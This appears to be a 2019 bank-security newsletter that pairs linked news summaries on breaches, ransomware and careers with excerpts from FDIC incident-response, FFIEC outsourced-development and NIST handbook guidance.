FYI - Tips for those of all ages interested in pursuing a career in cybersecurity - Today, we are facing a frightening shortage of cybersecurity professionals in the workforce. Specifically, this widening gap is expected to lead to 3.5 million jobs left unfilled, according to Cybersecurity Ventures, in the cybersecurity profession by 2021. https://www.scmagazine.com/home/opinion/executive-insight/tips-for-those-of-all-ages-interested-in-pursuing-a-career-in-cybersecurity/

Hacker Plants Keylogger Devices on Company Systems Faces 12yr in Jail - A hacker admitted to planting hardware keyloggers on computers belonging to two companies to get unauthorized to their networks and steal proprietary data. https://www.bleepingcomputer.com/news/security/hacker-plants-keylogger-devices-on-company-systems-faces-12yr-in-jail/

Global insurers face quiet strain from hacker ransom demands - Global insurers that cover cyberattacks are facing more claims related to ransom-demanding hackers who cripple businesses’ technology systems, and only stop after receiving substantial payments. https://www.reuters.com/article/us-usa-ransomware-insurance/global-insurers-face-quiet-strain-from-hacker-ransom-demands-idUSKBN1X41E3

The Ransomware Superhero of Normal, Illinois - Thanks to Michael Gillespie, an obscure programmer at a Nerds on Call repair store, hundreds of thousands of ransomware victims have recovered their files for free. https://www.propublica.org/article/the-ransomware-superhero-of-normal-illinois

We interviewed cyber experts on a Vegas ferris wheel. Then ride security showed up… - In the film “Ocean’s 11,” Danny Ocean and his team of expert cybercriminals execute a daring casino heist in glitzy Las Vegas. https://www.scmagazine.com/home/network-security/we-interviewed-leading-cyber-experts-on-the-worlds-tallest-ferris-wheel-then-security-showed-up/

ATTACKS, INTRUSIONS, DATA THEFT & LOSS

FYI - AWS Left Reeling After Eight-Hour DDoS - Amazon Web Services (AWS) customers were hit by severe outages yesterday after an apparent DDoS attack took S3 and other services offline for up to eight hours. https://www.infosecurity-magazine.com/news/aws-customers-hit-by-eighthour-ddos/

Antivirus hid more than 9,000 'cybercrime' reports from UK cops, says watchdog - Just one of Britain's 43 police forces treats online crime as a priority – while the Action Fraud organisation managed to withhold 9,000 so-called cyber-crime reports from cops thanks to badly configured antivirus on its reporting portal, according to a government watchdog. https://www.theregister.co.uk/2019/10/24/hmicfrs_report_cyber_crime/

Johannesburg’s city e-services disrupted by ransomware strike - An threat actor that calls itself the “Shadow Kill Hackers” has executed a data breach and ransomware attack against City of Johannesburg, South Africa — the second time in four months that the metropolis has contended with a cyber extortion plot. https://www.scmagazine.com/home/security-news/ransomware/johannesburgs-city-e-services-disrupted-by-ransomware-strike/

Skimming malware found on American Cancer Society’s online store - One Magecart group decided that helping cancer victims is not enough of a reason to deter them from hitting the American Cancer Society’s online store with skimming malware. https://www.scmagazine.com/home/retail/skimming-malware-found-on-american-cancer-societys-online-store/

Adobe leaves Creative Cloud database open, 7.5 million users exposed - An unsecured Elasticsearch database left exposed the account information of about 7.5 million Adobe Creative Cloud users. https://www.scmagazine.com/home/security-news/data-breach/adobe-leaves-creative-cloud-database-open-7-5-million-users-exposed/

St. Louis health center stymied by September ransomware attack - Betty Jean Kerr People’s Health Centers, a St. Louis-area medical and social services provider, was victimized last September by a ransomware attack that continues to prevent access to data collected from patients, health care providers and employees. https://www.scmagazine.com/home/security-news/ransomware/st-louis-health-center-stymied-by-september-ransomware-attack/

City of Johannesburg held for ransom by hacker gang - A group named "Shadow Kill Hackers" is asking local officials for 4 bitcoins or they'll release city data online. https://www.zdnet.com/article/city-of-johannesburg-held-for-ransom-by-hacker-gang/

UniCredit Breach Affects Three Million Records - Italian bank UniCredit has identified a breach of its IT systems affecting millions of customer records, according to breaking reports. https://www.infosecurity-magazine.com/news/unicredit-breach-affects-three/

Bed Bath & Beyond declares data incident - Home goods retailer Bed Bath & Beyond yesterday disclosed in a Securities & Exchange Commission 8-K filing that an unauthorized third party illegally accessed one percent of its online customers’ accounts. https://www.scmagazine.com/home/security-news/cybercrime/bed-bath-beyond-declares-data-incident/

Return to the top of the newsletter

WEB SITE COMPLIANCE - We continue the series regarding FDIC Supervisory Insights regarding Incident Response Programs.  (7 of 12)
  
  Define what constitutes an incident.
  
  An initial step in the development of a response program is to define what constitutes an incident. This step is important as it sharpens the organization's focus and delineates the types of events that would trigger the use of the IRP. Moreover, identifying potential security incidents can also make the possible threats seem more tangible, and thus better enable organizations to design specific incident-handling procedures for each identified threat.
  
  Detection
  
  The ability to detect that an incident is occurring or has occurred is an important component of the incident response process. This is considerably more important with respect to technical threats, since these can be more difficult to identify without the proper technical solutions in place. If an institution is not positioned to quickly identify incidents, the overall effectiveness of the IRP may be affected. Following are two detection-related best practices included in some institutions' IRPs.
  
  Identify indicators of unauthorized system access.
  
  Most banks implement some form of technical solution, such as an intrusion detection system or a firewall, to assist in the identification of unauthorized system access. Activity reports from these and other technical solutions (such as network and application security reports) serve as inputs for the monitoring process and for the IRP in general. Identifying potential indicators of unauthorized system access within these activity or security reports can assist in the detection process.

Return to the top of the newsletter

FFIEC IT SECURITY - We continue our series on the FFIEC interagency Information Security Booklet.  
   
   SYSTEMS DEVELOPMENT, ACQUISITION, AND MAINTENANCE - SOFTWARE DEVELOPMENT AND ACQUISITION
   
   Outsourced Development
   
   Many financial institutions outsource software development to third parties. Numerous vendor management issues exist when outsourcing software development. The vendor management program established by management should address the following:
   
   ! Verifying credentials and contracting only with reputable providers;
   ! Evaluating the provider's secure development environment, including background checks on its employees and code development and testing processes;
   ! Obtaining fidelity coverage;
   ! Requiring signed nondisclosure agreements to protect the financial institution's rights to source code and customer data as appropriate;
   ! Establishing security requirements, acceptance criterion, and test plans;
   ! Reviewing and testing source code for security vulnerabilities, including covert channels or backdoors that might obscure unauthorized access into the system;
   ! Restricting any vendor access to production source code and systems and monitoring their access to development systems; and
   ! Performing security tests to verify that the security requirements are met before implementing the software in production.

Return to the top of the newsletter

NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY - We continue the series on the National Institute of Standards and Technology (NIST) Handbook.

Section I. Introduction & Overview - Chapter 1

INTRODUCTION - 1.3 Organization

The first section of the handbook contains background and overview material, briefly discusses of threats, and explains the roles and responsibilities of individuals and organizations involved in computer security. It explains the executive principles of computer security that are used throughout the handbook. For example, one important principle that is repeatedly stressed is that only security measures that are cost-effective should be implemented. A familiarity with the principles is fundamental to understanding the handbook's philosophical approach to the issue of security.

The next three major sections deal with security controls: Management Controls⁵(II), Operational Controls (III), and Technical Controls (IV). Most controls cross the boundaries between management, operational, and technical. Each chapter in the three sections provides a basic explanation of the control; approaches to implementing the control, some cost considerations in selecting, implementing, and using the control; and selected interdependencies that may exist with other controls. Each chapter in this portion of the handbook also provides references that may be useful in actual implementation.

!  The Management Controls section addresses security topics that can be characterized as managerial. They are techniques and concerns that are normally addressed by management in the organization's computer security program. In general, they focus on the management of the computer security program and the management of risk within the organization.

!  The Operational Controls section addresses security controls that focus on controls that are, broadly speaking, implemented and executed by people (as opposed to systems). These controls are put in place to improve the security of a particular system (or group of systems). They often require technical or specialized expertise -- and often rely upon management activities as well as technical controls.

!  The Technical Controls section focuses on security controls that the computer system executes. These controls are dependent upon the proper functioning of the system for their effectiveness. The implementation of technical controls, however, always requires significant operational considerations -- and should be consistent with the management of security within the organization.

Finally, an example is presented to aid the reader in correlating some of the major topics discussed in the handbook. It describes a hypothetical system and discusses some of the controls that have been implemented to protect it. This section helps the reader better understand the decisions that must be made in securing a system, and illustrates the interrelationships among controls.

Definition of Sensitive Information

Many people think that sensitive information only requires protection from unauthorized disclosure. However, the Computer Security Act provides a much broader definition of the term "sensitive" information:

"any information, the loss, misuse, or unauthorized access to or modification of which could adversely affect the national interest or the conduct of federal programs, or the privacy to which individuals are entitled under section 552a of title 5, United States Code (the Privacy Act), but which has not been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept secret in the interest of national defense or foreign policy."

The above definition can be contrasted with the long-standing confidentiality-based information classification system for national security information (i.e., CONFIDENTIAL, SECRET, and TOP SECRET). This system is based only upon the need to protect classified information from unauthorized disclosure; the U.S. Government does not have a similar system for unclassified information. No government wide schemes (for either classified or unclassified information) exist which are based on the need to protect the integrity or availability of information.